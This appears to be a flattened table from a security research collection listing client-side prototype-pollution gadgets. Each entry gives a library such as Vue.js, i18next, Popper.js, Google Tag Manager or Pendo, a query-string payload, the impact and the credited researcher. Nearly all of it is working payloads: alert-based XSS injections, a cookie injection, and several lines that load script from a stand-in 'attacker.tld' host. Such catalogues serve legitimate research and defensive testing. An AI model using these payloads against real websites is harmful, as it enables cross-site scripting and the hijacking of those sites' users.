?__proto__[props][][value]=a  
&__proto__[name]=":''.constructor.constructor('alert(1)')(),"

XSS

\[1\]

st98\_

Vue.js

?__proto__[template]=<script>alert(1)</script>

XSS

\[1\]

huli

Demandbase Tag

?__proto__[Config][SiteOptimization][enabled]=1  
&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?

XSS

SPQR

@analytics/google-tag-manager

?__proto__[customScriptSrc]=//attacker.tld/xss.js

XSS

SPQR

i18next

?__proto__[lng]=cimode  
&__proto__[appendNamespaceToCIMode]=x  
&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

i18next < 19.8.5

?__proto__[lng]=a  
&__proto__[a]=b  
&__proto__[obj]=c  
&__proto__[k]=d  
&__proto__[d]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

i18next >= 19.8.5

?__proto__[lng]=a  
&__proto__[key]=<img/src/onerror%3dalert(1)>

Potential XSS

Sergey Bobrov

Google Analytics

?__proto__[cookieName]=COOKIE%3DInjection%3B

Cookie Injection

Sergey Bobrov

Popper.js

?__proto__[arrow][style]=color:red;transition:all%201s  
&__proto__[arrow][ontransitionend]=alert(1)

?__proto__[reference][style]=color:red;transition:all%201s  
&__proto__[reference][ontransitionend]=alert(2)

?__proto__[popper][style]=color:red;transition:all%201s  
&__proto__[popper][ontransitionend]=alert(3)

XSS

\[1\] \[2\]

Matheus Vrech

Pendo Agent

?__proto__[dataHost]=attacker.tld/js.js%23

XSS

Renwa

script.aculo.us  
String.constructor

?x=x  
&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>

XSS

Sergey Bobrov

hCaptcha (**Fixed**)

?__proto__[assethost]=javascript:alert(1)//

XSS

Masato Kinugawa

Google Closure

?__proto__[trustedTypes]=x  
&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>

XSS

Mathias Karlsson

Google Tag Manager

?__proto__[vtp_enableRecaptcha]=1  
&__proto__[srcdoc]=<script>alert(1)</script>

XSS

terjanq

Google Tag Manager

?__proto__[q][0][0]=require  
&__proto__[q][0][1]=x  
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7

XSS

Sergey Bobrov /  
Masato Kinugawa

Google Analytics

?__proto__[q][0][0]=require  
&__proto__[q][0][1]=x  
&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7

XSS

Sergey Bobrov /  
Masato Kinugawa

Tag

#git